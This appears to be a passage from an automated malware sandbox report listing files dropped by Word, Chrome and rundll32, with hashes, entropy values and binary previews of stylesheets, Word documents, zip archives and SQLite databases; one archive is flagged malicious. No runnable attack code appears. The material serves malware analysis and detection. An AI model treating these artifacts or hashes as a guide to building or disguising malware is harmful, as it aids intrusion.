                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):344303
                              Entropy (8bit):5.023195898304535
                              Encrypted:false
                              SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                              MD5:F079EC5E2CCB9CD4529673BCDFB90486
                              SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                              SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                              SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):250983
                              Entropy (8bit):5.057714239438731
                              Encrypted:false
                              SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                              MD5:F883B260A8D67082EA895C14BF56DD56
                              SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                              SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                              SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):51826
                              Entropy (8bit):5.541375256745271
                              Encrypted:false
                              SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                              MD5:2AB22AC99ACFA8A82742E774323C0DBD
                              SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                              SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                              SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                              Malicious:false
                              Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):47296
                              Entropy (8bit):6.42327948041841
                              Encrypted:false
                              SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                              MD5:5A53F55DD7DA8F10A8C0E711F548B335
                              SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                              SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                              SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                              Malicious:false
                              Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):34415
                              Entropy (8bit):7.352974342178997
                              Encrypted:false
                              SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                              MD5:7CDFFC23FB85AD5737452762FA36AAA0
                              SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                              SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                              SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                              Malicious:false
                              Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):3465076
                              Entropy (8bit):7.898517227646252
                              Encrypted:false
                              SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                              MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                              SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                              SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                              SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                              Malicious:false
                              Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):19357
                              Entropy (8bit):7.468747851366246
                              Encrypted:false
                              SSDEEP:384:Jrt+BNxt/ZtNNUyf6eR4KUdMdri24FPWA9/aAL:VAxllNDf64K+WL
                              MD5:E04716B0C866488A1825444D23939161
                              SHA1:245643809CCE5FE466B22D775776D14435C3214D
                              SHA-256:0CD28B8CEE9F5E0C87D5C3AFEF625612F6B63A5AAA3EA91B914F0CF7DBAF81BD
                              SHA-512:F5B448B6E1E8362C992CAA1FAB6AD5D0ECFAE1CF21B3DB139F838A6E5808EE7E2152271DBF299945E4E2BA87ECC91402C39CCB43BC3764C05AFE260DE5E580F8
                              Malicious:false
                              Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:modified
                              Size (bytes):162
                              Entropy (8bit):3.5367175887726146
                              Encrypted:false
                              SSDEEP:3:C1ClXLlAYfqIv3GqfUo4qMbEQv3xeljNOfMqE30VK:bleIuqfx4QQsp4fMqtE
                              MD5:6DE3D09FD2895F192E5C58BA170191C4
                              SHA1:E127F69BD3EEEAB5793CD9D19432780C49B4BA56
                              SHA-256:A1F3503479174DBE1D38B6F122C1153ACD599D5CEA2A9C76C4701B14DD8D7CF3
                              SHA-512:C22EFF6C4835A9E97AD829362DD8379C2A0497E922E538002703E577CC3A8F276E623DDA48F2B04C229F82E46DFF2AF276572620317817DEB000FEFC154ECF66
                              Malicious:false
                              Preview:.user...............................................e.n.g.i.n.e.e.r.........Z.@.J..-O.Xz.lM...x.O...{j......Z.@.J..>O...J.PXX.PXX.M...........PXX...Z.0.O..>O.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):19357
                              Entropy (8bit):7.468747851366246
                              Encrypted:false
                              SSDEEP:384:Jrt+BNxt/ZtNNUyf6eR4KUdMdri24FPWA9/aAL:VAxllNDf64K+WL
                              MD5:E04716B0C866488A1825444D23939161
                              SHA1:245643809CCE5FE466B22D775776D14435C3214D
                              SHA-256:0CD28B8CEE9F5E0C87D5C3AFEF625612F6B63A5AAA3EA91B914F0CF7DBAF81BD
                              SHA-512:F5B448B6E1E8362C992CAA1FAB6AD5D0ECFAE1CF21B3DB139F838A6E5808EE7E2152271DBF299945E4E2BA87ECC91402C39CCB43BC3764C05AFE260DE5E580F8
                              Malicious:false
                              Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):22
                              Entropy (8bit):2.6424239617719745
                              Encrypted:false
                              SSDEEP:3:QA6kLlAX:QAU
                              MD5:67B76DED2BAAFB19AF81ACCF3E85282C
                              SHA1:937AD3A872978BB13F2B81BBE66DC005C267992A
                              SHA-256:97D64040E4513A4EA84262C024A1CF30D84D536D2180EA503C1E0580328C6798
                              SHA-512:6D2392F8F646FA8F127F0A7124FA8FA13BEF50613C982FD69C1DA47EB9C61D83F2607633F1184EA289C795C7D69F72DF755E02316CFDFC2F00B2B6BFF97BE6C3
                              Malicious:false
                              Preview:..e.n.g.i.n.e.e.r.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                              Category:dropped
                              Size (bytes):2
                              Entropy (8bit):1.0
                              Encrypted:false
                              SSDEEP:3:Qn:Qn
                              MD5:F3B25701FE362EC84616A93A45CE9998
                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                              Malicious:false
                              Preview:..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):4.713001761513302
                              Encrypted:false
                              SSDEEP:3:C1ClXLlAnbP0GgMxioIS2g9DVyVd61osu8Jl/P:blsQG/pJVyVpsu8DP
                              MD5:45FED64C2968B600A329C5B90AAF52A8
                              SHA1:809F36F7AFF62C5BC0C4092F7747DCE68DD6DB21
                              SHA-256:5D9A1834169FF999D4455B790A3EF27C838719DD933FB7760017098858340DDA
                              SHA-512:5DC93DF888ABD484BDB2AF2125B9758F019F8FC1A7C07766737C78B83503B1D3BE06EB5C570745DF69B5D65BAD9897EC8C898272B6E84EB1632B805F9350EBB6
                              Malicious:false
                              Preview:.user...............................................e.n.g.i.n.e.e.r...uF.%.O...`......KJ.rx....Sl.....N..f.m...6.0..-.W....,?.........V. O.}..j......N..=.j
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):15958
                              Entropy (8bit):7.9733146688895955
                              Encrypted:false
                              SSDEEP:384:23wL2AyiV9wwwwcfz7hLE9K+HHxqr9b2jJdl690rtJj:OxBz7hEdHHosjJeGrv
                              MD5:C7F49F8D09D6B64308706E2BCE4AC111
                              SHA1:2FF16DAC0F3DEF2785F464541DC534B0037BC97F
                              SHA-256:839B524AF66BA603950E69BD8059075918DDBB82657E554CC6E6F1D070D775D8
                              SHA-512:B3D4DFED05E0C04673221DFDC86A06865E67B80D23ABB72052AE27CD05B0BFA8D077C2A565872245E8639C18E04B525003468A573DAB66D2C9A761471001988F
                              Malicious:false
                              Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):25518
                              Entropy (8bit):7.981260120775725
                              Encrypted:false
                              SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
                              MD5:9C4B364491E6AF11CC33DF28C33C4216
                              SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
                              SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
                              SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
                              Malicious:true
                              Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):25518
                              Entropy (8bit):7.981260120775725
                              Encrypted:false
                              SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
                              MD5:9C4B364491E6AF11CC33DF28C33C4216
                              SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
                              SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
                              SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
                              Malicious:false
                              Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):40960
                              Entropy (8bit):0.8553638852307782
                              Encrypted:false
                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                              MD5:28222628A3465C5F0D4B28F70F97F482
                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):159744
                              Entropy (8bit):0.5394293526345721
                              Encrypted:false
                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                              Malicious:false
                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.695505889681456
                              Encrypted:false
                              SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                              MD5:3E1BF32E65136B415337727A75BB2991
                              SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                              SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                              SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                              Malicious:false
                              Preview:IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.695505889681456
                              Encrypted:false
                              SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                              MD5:3E1BF32E65136B415337727A75BB2991
                              SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                              SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                              SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                              Malicious:false
